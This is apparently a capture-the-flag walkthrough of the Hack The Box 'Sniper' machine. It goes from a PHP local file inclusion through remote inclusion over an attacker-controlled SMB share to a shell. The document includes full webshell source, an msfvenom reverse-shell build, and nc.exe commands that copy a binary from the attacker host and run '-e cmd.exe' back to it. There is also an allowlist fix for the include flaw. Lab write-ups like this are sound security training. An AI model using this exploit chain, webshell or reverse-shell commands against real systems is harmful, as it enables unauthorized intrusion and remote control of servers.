4 :80 /blog > LFI > smbRFI

http://sniper.htb/blog/?lang=blog-fr.php
# maybe LFI / RFI?

# tested using http://sniper.htb/blog/index.php?lang=header.html
| a relative path to reach ..\user\db.php returns an error,
| so we probably need an absolute path

Trying C:\Windows\System32\Drivers\etc\hosts
| as it's running PHP, forward slashes and a drive-less absolute path should also work
view-source:http://sniper.htb/blog/index.php?lang=/Windows/win.ini
| shows the file: the parameter goes straight into an include, so this is LFI

</html>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</body>
</html>

# RFI over http:// fails
http://sniper.htb/blog/index.php?lang=http://10.10.16.7/kashz
# no callback: include over the http:// wrapper needs allow_url_include=On, which is Off by default

# trying an SMB (UNC) path instead: on Windows, //host/share/file is resolved by the OS
# as a UNC path, not by PHP's URL wrappers, so allow_url_include does not gate it
http://sniper.htb/blog/index.php?lang=//10.10.16.7/kashz

$ smbserver.py -smb2support drive .
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49765)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found KASHZ
[-] SMB2_TREE_CONNECT not found KASHZ

# we get a callback: the box authenticates to our server (empty user, SNIPER domain)
# without any credentials; the tree connect only fails because the share is
# named drive, not kashz, so the path must be //10.10.16.7/drive/<file>
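What the behaviour above implies about the server-side code, as an added example (PHP, written for this page, not the Sniper box's actual source): an include that trusts ?lang= next to an allowlisted version. The file name blog-en.php and the mapping are assumptions; only blog-fr.php appears on the page.

```php
<?php
// Added example, not the real index.php: a reconstruction of the include
// pattern the ?lang= behaviour implies, next to a hardened version.

// Vulnerable shape (assumed): the parameter is handed straight to include().
// On Windows, "//10.10.16.7/drive/info.php" is a UNC path. PHP hands it to the
// filesystem, which fetches it over SMB, so allow_url_include=Off (which stops
// the http:// attempt) never comes into play. The IIS worker makes the outbound
// SMB connection itself, which is why smbserver.py sees an empty user in the
// SNIPER domain and needs no credentials.
function include_lang_vulnerable(string $lang): void
{
    include $lang;
}

// Hardened shape: map the parameter onto a fixed allowlist and ignore anything
// else. No part of the user value reaches the include path, so ../, absolute
// paths and UNC paths are all irrelevant.
const LANG_FILES = [
    'en' => 'blog-en.php', // assumed file name
    'fr' => 'blog-fr.php', // seen on the page
];

function resolve_lang(?string $lang): string
{
    // Fall back to English when the parameter is missing or not allowlisted.
    return LANG_FILES[$lang] ?? LANG_FILES['en'];
}

function include_lang_safe(?string $lang): void
{
    include __DIR__ . DIRECTORY_SEPARATOR . resolve_lang($lang);
}

// Self-check of the allowlist logic (no files are actually included here).
assert(resolve_lang('fr') === 'blog-fr.php');
assert(resolve_lang('/Windows/win.ini') === 'blog-en.php');
assert(resolve_lang('//10.10.16.7/drive/info.php') === 'blog-en.php');
assert(resolve_lang('http://10.10.16.7/kashz') === 'blog-en.php');
assert(resolve_lang(null) === 'blog-en.php');
```

The allowlist is the fix; stripping "../" or prefixing a directory would still leave the UNC case open, because a value like //host/share/file contains neither a dot-dot nor a drive letter.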

# testing simple info.php
$ cat info.php
<?php
phpinfo();
?>

http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/info.php
| we get phpinfo
System 	Windows NT SNIPER 10.0 build 17763 (Windows Server 2016) i586
Architecture 	x86 
Loaded Configuration File 	C:\Program Files (x86)\PHP\v7.3\php.ini
disable_functions	no value
$_SERVER['USERDOMAIN']	WORKGROUP
$_SERVER['USERNAME']	SNIPER$
$_SERVER['SCRIPT_FILENAME']	C:\inetpub\wwwroot\blog\index.php

# disable_functions is empty, so shell_exec/system/proc_open are all available for command execution
# (note PHP is a 32-bit build under Program Files (x86) on an x64 host; the "Windows Server 2016"
#  string is just PHP's label for build 17763, systeminfo below reports Server 2019)
# putting web.php (a command webshell) on the share and including it the same way
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/web.php
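The page does not reproduce web.php. An added minimal stand-in (written for this page, not the author's file) that would produce the CMD: output below; the parameter name cmd and the form layout are assumptions:

```php
<?php
// Added example of a minimal command webshell served from the attacker's SMB
// share and pulled in through include "//10.10.16.7/drive/web.php", so it runs
// inside the IIS worker as IUSR. Parameter name "cmd" is hypothetical.
function run_cmd(string $cmd): string
{
    // shell_exec goes through cmd.exe on Windows, so && chains and
    // redirections work. disable_functions is empty on this host, so
    // nothing here is filtered. 2>&1 folds stderr into the returned output.
    $out = shell_exec($cmd . ' 2>&1');
    return is_string($out) ? $out : '';
}

if (isset($_REQUEST['cmd'])) {
    // Echo the command and its output inside <pre> so that whoami /priv
    // and systeminfo keep their column layout in the browser.
    echo '<pre>CMD: ' . htmlspecialchars($_REQUEST['cmd'], ENT_QUOTES) . "\n"
        . htmlspecialchars(run_cmd($_REQUEST['cmd']), ENT_QUOTES) . '</pre>';
}
?>
<!-- No action attribute: the form posts back to the same URL, query string
     (?lang=//10.10.16.7/drive/web.php) included, so the include fires again. -->
<form method="post">
  <input type="text" name="cmd" size="80" autofocus>
  <input type="submit" value="run">
</form>
```

Every request re-reads web.php over SMB, so the share must stay up for as long as the shell is used; that is also why a later reverse shell is preferable to living inside the include.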

CMD: whoami && whoami /priv && systeminfo
nt authority\iusr

PRIVILEGES INFORMATION
----------------------
Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

Host Name:                 SNIPER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 N/A

# don't have write perms at C:\inetpub\wwwroot\blog or C:\users\public\
# tried running a nishang reverse shell, PS cannot seem to run it?
# tried copying an msfvenom exe to C:\windows\temp, AV blocks the write (Defender on a stock Server 2019):
| Operation did not complete successfully because the file contains a virus or potentially unwanted software.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=445 -f exe -o kashz.exe -e "x86/shikata_ga_nai"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 487 (iteration=0)
x86/shikata_ga_nai chosen with final size 487
Payload size: 487 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe

CMD: copy \\10.10.16.7\drive\kashz.exe C:\windows\temp\kashz.exe
        1 file(s) copied.
# shell won't execute, tried ports 445 and 49667 - no callback
# likely causes: x86/shikata_ga_nai wraps a 32-bit decoder stub around a 64-bit payload,
# so the exe is not valid x64 code even if AV lets it through; and Defender scans on execution, not only on write

# via nc.exe
copy \\10.10.16.7\drive\nc.exe C:\windows\temp\nc.exe
C:\windows\temp\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.151] 49831
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>
